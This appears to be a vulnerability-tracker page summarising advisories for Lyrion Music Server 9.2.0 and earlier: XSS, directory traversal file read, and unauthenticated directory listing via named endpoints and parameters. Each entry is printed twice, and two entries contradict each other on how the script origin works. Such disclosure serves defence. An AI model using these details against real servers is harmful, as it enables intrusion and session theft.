Lyrion Music Server
Monthly
Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows unauthenticated remote attackers to inject arbitrary JavaScript into victims' browsers via unsanitized advanced search parameters, enabling session token theft and account hijacking with a single user-click interaction. The changed scope (S:C) in the CVSS vector confirms the injected script executes outside the origin of the vulnerable application, amplifying cross-domain impact. No public exploit identified at time of analysis and no CISA KEV listing, but the ZeroScience Lab advisory reference is a known PoC-publishing outlet - PoC availability should be treated as likely pending confirmation.
Unauthenticated arbitrary file read in Lyrion Music Server 9.2.0 allows remote attackers to retrieve sensitive files from the host by manipulating directory traversal sequences in file path parameters handled by the embedded web server. The flaw is network-reachable with no authentication or user interaction required, and publicly available exploit code exists via the Zero Science Lab advisory ZSL-2026-5992. No CISA KEV listing or EPSS score was provided, so widespread opportunistic exploitation has not been confirmed, but the low barrier to abuse makes opportunistic scanning likely.
Arbitrary filesystem directory listing in Lyrion Music Server 9.2.0 exposes any host directory to remote unauthenticated attackers via the readdirectory query, which accepts an unsandboxed folder parameter with no path restriction. Both the CLI service on TCP port 9090 and the HTTP JSON-RPC endpoint at /jsonrpc.js are affected, presenting a dual-protocol attack surface that requires no credentials in the default configuration. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the trivial attack complexity - a single unauthenticated network request - significantly lowers the real-world barrier to abuse.
Stored cross-site scripting in Lyrion Music Server 9.2.0 allows remote attackers to inject JavaScript payloads via media file metadata fields (GENRE, ARTIST, ALBUM) that execute when other users browse the web interface. With CVSS 7.2 and a changed scope, successful exploitation can reach management functions and disclose settings. No public exploit identified at time of analysis, and no CISA KEV listing.
Stored cross-site scripting in Lyrion Music Server 9.2.0's log viewer allows unauthenticated remote attackers to inject persistent JavaScript via unescaped template variables, executing arbitrary scripts in the browsers of administrators or other users who view the logs. Injection vectors include the search, lines, and path query parameters as well as indirect channels such as URLs, User-Agent headers, stream titles, and player names that get written to the server log. No public exploit identified at time of analysis, but the CVSS 7.2 score reflects a scope-changed impact (S:C) due to the cross-origin nature of XSS.
Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows a remote unauthenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by tricking them into visiting a crafted URL targeting the server.log endpoint's search parameter. The vulnerability carries a changed scope (S:C in CVSS), meaning malicious script executes in the context of the affected application's origin, enabling session theft, credential harvesting, or UI redressing against users of the media server interface. No public exploit is confirmed at time of analysis, and no KEV listing exists, but the advisory was published to zeroscience.mk - a research outlet that routinely accompanies disclosures with proof-of-concept code.
A stored cross-site scripting (XSS) vulnerability exists in the web interface of Lyrion Music Server <= 9.0.3. An authenticated user with access to Settings Player can save arbitrary HTML/JavaScript in the Player name field. That value is stored by the server and later rendered without proper output encoding on the Information (Player Info) tab, causing the script to execute in the context of any user viewing that page.
Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows unauthenticated remote attackers to inject arbitrary JavaScript into victims' browsers via unsanitized advanced search parameters, enabling session token theft and account hijacking with a single user-click interaction. The changed scope (S:C) in the CVSS vector confirms the injected script executes outside the origin of the vulnerable application, amplifying cross-domain impact. No public exploit identified at time of analysis and no CISA KEV listing, but the ZeroScience Lab advisory reference is a known PoC-publishing outlet - PoC availability should be treated as likely pending confirmation.
Unauthenticated arbitrary file read in Lyrion Music Server 9.2.0 allows remote attackers to retrieve sensitive files from the host by manipulating directory traversal sequences in file path parameters handled by the embedded web server. The flaw is network-reachable with no authentication or user interaction required, and publicly available exploit code exists via the Zero Science Lab advisory ZSL-2026-5992. No CISA KEV listing or EPSS score was provided, so widespread opportunistic exploitation has not been confirmed, but the low barrier to abuse makes opportunistic scanning likely.
Arbitrary filesystem directory listing in Lyrion Music Server 9.2.0 exposes any host directory to remote unauthenticated attackers via the readdirectory query, which accepts an unsandboxed folder parameter with no path restriction. Both the CLI service on TCP port 9090 and the HTTP JSON-RPC endpoint at /jsonrpc.js are affected, presenting a dual-protocol attack surface that requires no credentials in the default configuration. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the trivial attack complexity - a single unauthenticated network request - significantly lowers the real-world barrier to abuse.
Stored cross-site scripting in Lyrion Music Server 9.2.0 allows remote attackers to inject JavaScript payloads via media file metadata fields (GENRE, ARTIST, ALBUM) that execute when other users browse the web interface. With CVSS 7.2 and a changed scope, successful exploitation can reach management functions and disclose settings. No public exploit identified at time of analysis, and no CISA KEV listing.
Stored cross-site scripting in Lyrion Music Server 9.2.0's log viewer allows unauthenticated remote attackers to inject persistent JavaScript via unescaped template variables, executing arbitrary scripts in the browsers of administrators or other users who view the logs. Injection vectors include the search, lines, and path query parameters as well as indirect channels such as URLs, User-Agent headers, stream titles, and player names that get written to the server log. No public exploit identified at time of analysis, but the CVSS 7.2 score reflects a scope-changed impact (S:C) due to the cross-origin nature of XSS.
Reflected cross-site scripting in Lyrion Music Server 9.2.0 allows a remote unauthenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by tricking them into visiting a crafted URL targeting the server.log endpoint's search parameter. The vulnerability carries a changed scope (S:C in CVSS), meaning malicious script executes in the context of the affected application's origin, enabling session theft, credential harvesting, or UI redressing against users of the media server interface. No public exploit is confirmed at time of analysis, and no KEV listing exists, but the advisory was published to zeroscience.mk - a research outlet that routinely accompanies disclosures with proof-of-concept code.
A stored cross-site scripting (XSS) vulnerability exists in the web interface of Lyrion Music Server <= 9.0.3. An authenticated user with access to Settings Player can save arbitrary HTML/JavaScript in the Player name field. That value is stored by the server and later rendered without proper output encoding on the Information (Player Info) tab, causing the script to execute in the context of any user viewing that page.